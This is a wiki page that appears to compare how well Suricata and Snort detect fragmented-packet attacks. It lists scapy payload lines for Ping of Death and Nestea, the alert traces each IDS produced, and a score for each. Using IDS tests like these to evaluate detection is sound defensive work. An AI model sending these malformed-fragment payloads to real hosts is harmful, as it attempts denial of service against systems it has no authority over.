Suricata-vs-snort/Test-cases/Fragmented-packets
Jump to navigation
Jump to search
You are here: | Fragmented packets
|
Synthesis
Test | Suricata | Snort |
---|---|---|
Ping of death | 0 | 1 |
Nestea attack | 1 | 1 |
TOTAL | 1 | 2 |
Ping of death
- Test: Ping of death
- Payload (scapy):
send( fragment(IP(dst="192.168.100.35")/ICMP()/("X"*60000)) )
- Suricata trace:
03/10/2011-13:55:12.825014 [**] [1:384:5] ICMP PING [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.37:8 -> 192.168.100.35:0 03/10/2011-13:55:13.512259 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:0 -> 192.168.100.37:0
- Suricata score: 0
- Snort trace:
[**] [123:8:1] (spp_frag3) Fragmentation overlap [**] [Classification: Generic Protocol Command Decode] [Priority: 3] 04/20-09:32:06.820435 192.168.100.45 -> 192.168.100.48 ICMP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:828 Frag Offset: 0x1CE8 Frag Size: 0x0328
- Snort score: 1
Nestea attack
- Test: Nestea attack
- Payload (scapy):
send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*10)) send(IP(dst="192.168.100.35", id=42, frag=48)/("X"*116)) send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*224))
- Suricata trace:
03/10/2011-13:58:00.924783 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53 03/10/2011-13:58:30.921484 [**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:11 -> 192.168.100.37:1 03/10/2011-13:58:47.715668 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53
- Suricata score: 1
- Snort trace:
[**] [123:3:1] (spp_frag3) Short fragment, possible DoS attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] 04/20-09:33:07.433934 192.168.100.45 -> 192.168.100.48 UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF Frag Offset: 0x0000 Frag Size: 0x0012 [**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**] [Classification: Misc activity] [Priority: 3] 04/20-09:33:37.430948 192.168.100.48 -> 192.168.100.45 ICMP TTL:64 TOS:0xC0 ID:38314 IpLen:20 DgmLen:64 Type:11 Code:1 TTL EXCEEDED TIME EXCEEDED IN FRAG REASSEMBLY ** ORIGINAL DATAGRAM DUMP: 192.168.100.45:53 -> 192.168.100.48:53 UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF Len: 10 Csum: 64503 (8 more bytes of original packet) ** END OF DUMP [**] [123:8:1] (spp_frag3) Fragmentation overlap [**] [Classification: Generic Protocol Command Decode] [Priority: 3] 04/20-09:33:52.409799 192.168.100.45 -> 192.168.100.48 UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:252 MF Frag Offset: 0x0000 Frag Size: 0x00E8
- Snort score: 1